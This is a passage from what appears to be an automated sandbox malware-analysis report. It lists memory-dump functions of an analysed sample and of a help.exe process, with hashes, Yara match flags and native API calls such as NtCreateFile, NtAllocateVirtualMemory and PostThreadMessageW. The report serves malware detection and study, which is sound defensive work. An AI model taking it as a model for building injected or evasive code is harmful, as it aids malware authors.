                                                                    • Instruction ID: 052342e678cf9187717ada033db46855a7430b849b8b9aa1c9218fff01be8a4c
                                                                    • Opcode Fuzzy Hash: 9126b2c2201d0226219994bf6623e8153371eb9b2699bbfcdef9ab0c2a392e38
                                                                    • Instruction Fuzzy Hash: FC90026124904446D1107599D408E065005A7D4245F51D021E1054599DC6758851B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779760, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d57cd515f99dd680f5682487e59087a7d6773ddac8d4f2915b976daa2521b252
                                                                    • Instruction ID: dc50ff2618b8245d2463c8d8e2ae9c05240511086bfe35e703504527662113d7
                                                                    • Opcode Fuzzy Hash: d57cd515f99dd680f5682487e59087a7d6773ddac8d4f2915b976daa2521b252
                                                                    • Instruction Fuzzy Hash: 9890027124500407D1107199D508B075005A7D4241F51D421E041455CDD69688517161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779730, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ed780b5e215a2da9274a21ef2243f01ae0b3a62df6a733069ea816a0e6b7b3fa
                                                                    • Instruction ID: 5e65c9f227cd0ed0537ff8069e32ca84190fd94a81cca94fa4ec1e9371f9d701
                                                                    • Opcode Fuzzy Hash: ed780b5e215a2da9274a21ef2243f01ae0b3a62df6a733069ea816a0e6b7b3fa
                                                                    • Instruction Fuzzy Hash: BF90026164900406D1507199D418B065015A7D4241F51D021E0014558DC6998A5576E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0177A710, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1d92dec7e3b16569d44fd35f3d7f09123a4e8be3b25643d2eafd76448c4c40d8
                                                                    • Instruction ID: 95a683b27d81680177687f79d1073793fab41e8d7a19b45872e7718bc892d633
                                                                    • Opcode Fuzzy Hash: 1d92dec7e3b16569d44fd35f3d7f09123a4e8be3b25643d2eafd76448c4c40d8
                                                                    • Instruction Fuzzy Hash: 70900271345000569510B6D9D804E4A9105A7F4341B51D025E4004558CC59488617161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779650, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cefea8671b798f5c9e8f8d3b42fa2272705168de28ab9de170cc254a2cbbd016
                                                                    • Instruction ID: 023844e9b30c8c1408a4dc9698d50e3cdb2ea3c9afced73da6660d673aca3b83
                                                                    • Opcode Fuzzy Hash: cefea8671b798f5c9e8f8d3b42fa2272705168de28ab9de170cc254a2cbbd016
                                                                    • Instruction Fuzzy Hash: 2690027124904846D1507199C404E465015A7D4345F51C021E0054698DD6658D55B6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779610, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db1f69420103fde52786b18adc7292a583c39f139e8ae6fa981d5fe3faf0a1ef
                                                                    • Instruction ID: dfa41f4e83a4a768442bfeacbe218a259e7522816fbe0aad57ef4137dd445adb
                                                                    • Opcode Fuzzy Hash: db1f69420103fde52786b18adc7292a583c39f139e8ae6fa981d5fe3faf0a1ef
                                                                    • Instruction Fuzzy Hash: 4090027164900806D1607199C414B465005A7D4341F51C021E0014658DC7958A5576E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017796D0, Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 03d63450be5a4265054fd0f4f12ab9a3ab83ccfd36769bcffd4f1f85cfe4c394
                                                                    • Instruction ID: 0642f80cd08d381db3d83c543d7d6afeeb987cf0b7083e3a72c894fe9eb13c09
                                                                    • Opcode Fuzzy Hash: 03d63450be5a4265054fd0f4f12ab9a3ab83ccfd36769bcffd4f1f85cfe4c394
                                                                    • Instruction Fuzzy Hash: AA90027124500846D1107199C404F465005A7E4341F51C026E0114658DC655C8517561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 01779670, Relevance: .0, Instructions: 2COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: 4a7ab07b44d6136e6226d333d157ca90fb9c87a0c67772db8e3f1d1db80acb2d
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 017CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017CFDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017CFE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017CFE2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 040f9a1f733bf94000c2e126ee1664897dc1de3505e3d4df87bff845ab677267
                                                                    • Instruction ID: 326d02498f02f25a2659a37cd36b26988af972938c4fd83efcbee36b9d59a2a3
                                                                    • Opcode Fuzzy Hash: 040f9a1f733bf94000c2e126ee1664897dc1de3505e3d4df87bff845ab677267
                                                                    • Instruction Fuzzy Hash: 25F0FC72200501BFE6201A45DC05F23FF5ADB44B30F14431CF614561E1D962F86086F0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: help.exe PID: 7084 Parent PID: 3292 help.exeCOMMON

                                                                    Executed Functions

                                                                    Function 003A81B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,003A3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,003A3B87,007A002E,00000000,00000060,00000000,00000000), ref: 003A81FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: .z`
                                                                    • API String ID: 823142352-1441809116
                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction ID: 8fb1e551a534163b7b27f660d93acce64766b34f662d7a4adf46aca05745f39e
                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                    • Instruction Fuzzy Hash: 17F0B6B2200108ABCB08CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A82E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtClose.NTDLL( =:,?,?,003A3D20,00000000,FFFFFFFF), ref: 003A8305
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: =:
                                                                    • API String ID: 3535843008-1810370302
                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction ID: 9890879f13047cfbec14acd33e800fc5c01857aa6e4398f69699732214788259
                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                    • Instruction Fuzzy Hash: BED012756002146BD710EF98CC45ED7775CEF44750F154455BA185B242C930F90086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A8260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,003A3A01,?,?,?,?,003A3A01,FFFFFFFF,?,B=:,?,00000000), ref: 003A82A5
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction ID: b4b32cbc914bccee926f830cde587237dfa4ea523405982f4aacbcc099a16c8f
                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                    • Instruction Fuzzy Hash: FFF0A4B2200208ABCB14DF89DC85EEB77ADEF8C754F158248BA1D97241DA30E8118BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A8390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00392D11,00002000,00003000,00000004), ref: 003A83C9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction ID: 8deaf05e3f845cb8b5f95ca9b00207eed24f98a1ba32a98eea9ca377776b7ec1
                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                    • Instruction Fuzzy Hash: C1F015B2200208ABCB14DF89CC81EEB77ADEF88750F118148BE0897241CA30F810CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E09A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fe363d4220ff6706cfc9a514b9f225c328aaeff67d56dc1c2dbcf319573f8a67
                                                                    • Instruction ID: 80b8b70afa8f64e44aa004434d85cfc09c7627488819853e6200c0beb2e3e41e
                                                                    • Opcode Fuzzy Hash: fe363d4220ff6706cfc9a514b9f225c328aaeff67d56dc1c2dbcf319573f8a67
                                                                    • Instruction Fuzzy Hash: 8090027135181042D20065694C15B47040997D0343F51D525A0144554CC9558861A561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 612b7b4db6e6e0de0a57e499c1825a626dc48e9cb3fa9965cced9f2492049853
                                                                    • Instruction ID: 93380f07473dc28bf91c37112c2affb270ee68ed9bc8d3a078d07e5ce0bff966
                                                                    • Opcode Fuzzy Hash: 612b7b4db6e6e0de0a57e499c1825a626dc48e9cb3fa9965cced9f2492049853
                                                                    • Instruction Fuzzy Hash: A490027134101413D11161594905747040D97D0281F91D822A0414558D96968952F161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E09840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5620efe140b4aff2a9f83daf1a27ef0b36f516dc34970b8a440459eb3922e934
                                                                    • Instruction ID: 98bfb9b3829a0c0e3026681f19b7f2775365b40ef61f293d529ea3c9e58f86c1
                                                                    • Opcode Fuzzy Hash: 5620efe140b4aff2a9f83daf1a27ef0b36f516dc34970b8a440459eb3922e934
                                                                    • Instruction Fuzzy Hash: C4900271382051525545B1594805547440AA7E0281791D422A1404950C85669856E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ff226bba34929ea3fd71d5713bd94781ab8aaa6c6daca2a60a7d96d53bcabf5a
                                                                    • Instruction ID: 648112b14818366299619406fee4f91f7447b685b163eb161246e0ed0cfd67b6
                                                                    • Opcode Fuzzy Hash: ff226bba34929ea3fd71d5713bd94781ab8aaa6c6daca2a60a7d96d53bcabf5a
                                                                    • Instruction Fuzzy Hash: 639002B138101442D10061594815B470409D7E1341F51D425E1054554D8659CC52B166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4de07b7ad8d8afd08c52a9a4a611fd51657e7ef4585aa946095eebb884350d69
                                                                    • Instruction ID: d29021cfacae72ca0a4fbe3881abf2bf566a5dd0f42fef805640f74ad45cfb57
                                                                    • Opcode Fuzzy Hash: 4de07b7ad8d8afd08c52a9a4a611fd51657e7ef4585aa946095eebb884350d69
                                                                    • Instruction Fuzzy Hash: 4F9002B134101402D14071594805787040997D0341F51D421A5054554E86998DD5B6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 36ba574541e3cf464aa7fd36fb305c0212308380875a9e6f975f470d158e1284
                                                                    • Instruction ID: 9c12bf8799103336e146d2f25912bd92c366abee4183fc5eb3874c9c718b3007
                                                                    • Opcode Fuzzy Hash: 36ba574541e3cf464aa7fd36fb305c0212308380875a9e6f975f470d158e1284
                                                                    • Instruction Fuzzy Hash: 0390027134109802D1106159880578B040997D0341F55D821A4414658D86D58891B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E096D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: e00b98b058e3cc8a13f97a8858bc26b15fb7f0ad84254cf53434de1c8b058f24
                                                                    • Instruction ID: be2def7077192d5ec341fe3eb65e95493b94e8fd3ed890120835686b6ed5b4c2
                                                                    • Opcode Fuzzy Hash: e00b98b058e3cc8a13f97a8858bc26b15fb7f0ad84254cf53434de1c8b058f24
                                                                    • Instruction Fuzzy Hash: A490027134101842D10061594805B87040997E0341F51D426A0114654D8655C851B561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1266053e0624e84190002eea55005231e742d2653c6f288361403a0c65d2259a
                                                                    • Instruction ID: e27c4d175a7e1c624aff81173053a35d18a5a66131d9ae82e08179d5645eebc8
                                                                    • Opcode Fuzzy Hash: 1266053e0624e84190002eea55005231e742d2653c6f288361403a0c65d2259a
                                                                    • Instruction Fuzzy Hash: 6790027134101802D1807159480568B040997D1341F91D425A0015654DCA558A59B7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E09650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 67591cb9bd3d7e390bfc1c8e3ba06b6394719ca1263985717c855783a18ee480
                                                                    • Instruction ID: 8dfff9d09e5800f4c398e8381a34d37248fad5e6f48d03c70f7ee019029f675e
                                                                    • Opcode Fuzzy Hash: 67591cb9bd3d7e390bfc1c8e3ba06b6394719ca1263985717c855783a18ee480
                                                                    • Instruction Fuzzy Hash: 2E90027134505842D14071594805A87041997D0345F51D421A0054694D96658D55F6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E09FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 652a796560c9ab23acc86f75b6088343e6bd8816c94244eb77c103ec49f5e6f8
                                                                    • Instruction ID: d343905c2df847db657a8a9a1278803557a5681bda651723ae433dca4fa1e5b3
                                                                    • Opcode Fuzzy Hash: 652a796560c9ab23acc86f75b6088343e6bd8816c94244eb77c103ec49f5e6f8
                                                                    • Instruction Fuzzy Hash: C790027135115402D11061598805747040997D1241F51D821A0814558D86D58891B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E09780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 982bb797a2c83ea3c4988c0a18451dd30d7257992fb8f74fef2d185a21daa676
                                                                    • Instruction ID: bfc64372f9d008c206734783c7428e8e49b92788553c16e9eec086d3c118f933
                                                                    • Opcode Fuzzy Hash: 982bb797a2c83ea3c4988c0a18451dd30d7257992fb8f74fef2d185a21daa676
                                                                    • Instruction Fuzzy Hash: 2A90027935301002D1807159580964B040997D1242F91E825A0005558CC9558869A361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E09710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 95863106d09e82a504646f5046ea39f18970ff529964358b5febf7d4d46ecee9
                                                                    • Instruction ID: 355b7a4839073f44dbcda75f17dbbbedc0731adf7fb66258ab6168cd2f96e749
                                                                    • Opcode Fuzzy Hash: 95863106d09e82a504646f5046ea39f18970ff529964358b5febf7d4d46ecee9
                                                                    • Instruction Fuzzy Hash: 0C90027134101402D10065995809687040997E0341F51E421A5014555EC6A58891B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 119a6d1fcb02a37cd3874a32564eb8ca463a8e54e355fb8eb4f5deab1408328d
                                                                    • Instruction ID: f1a7d2a960ff4af9f9aead4f28cb4e1d30e05a647994e9820621e6fd5df0a877
                                                                    • Opcode Fuzzy Hash: 119a6d1fcb02a37cd3874a32564eb8ca463a8e54e355fb8eb4f5deab1408328d
                                                                    • Instruction Fuzzy Hash: 4E9002B134201003410571594815657440E97E0241B51D431E1004590DC5658891B165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02E09540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp, Offset: 02DA0000, based on PE: true
                                                                    • Associated: 0000000E.00000002.507743470.0000000002EBB000.00000040.00000001.sdmp Download File
                                                                    • Associated: 0000000E.00000002.507767036.0000000002EBF000.00000040.00000001.sdmp Download File
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 465f0909dfb79d61ff6ae1d5a1314313fd46724dd5617274e8afe873dd3a5d29
                                                                    • Instruction ID: 6b65f663068ec7a36ab7c0b169b0d5c6d0a34b36c4ba5b567489a78db5435418
                                                                    • Opcode Fuzzy Hash: 465f0909dfb79d61ff6ae1d5a1314313fd46724dd5617274e8afe873dd3a5d29
                                                                    • Instruction Fuzzy Hash: 52900475351010030105F55D0F05547044FD7D53D1351D431F1005550CD771CC71F171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00397206, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71threadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003972BA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003972DB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID: 3333
                                                                    • API String ID: 1836367815-2924271548
                                                                    • Opcode ID: 3ef57512245ec6345fc6d05a575fb83dd09e867a5264305774cc2b53027b0cb0
                                                                    • Instruction ID: 66b03c7138e378cb172b4874dd77252ae30ea24f8e8020f4ddcea22838ec3c16
                                                                    • Opcode Fuzzy Hash: 3ef57512245ec6345fc6d05a575fb83dd09e867a5264305774cc2b53027b0cb0
                                                                    • Instruction Fuzzy Hash: D811C632A942187BEF26A794DC42FBE766C9B01B50F19441AFA44FF1C1E6A4A90543E2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 003A6ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 003A6F78
                                                                    Strings
                                                                    Memory Dump Source
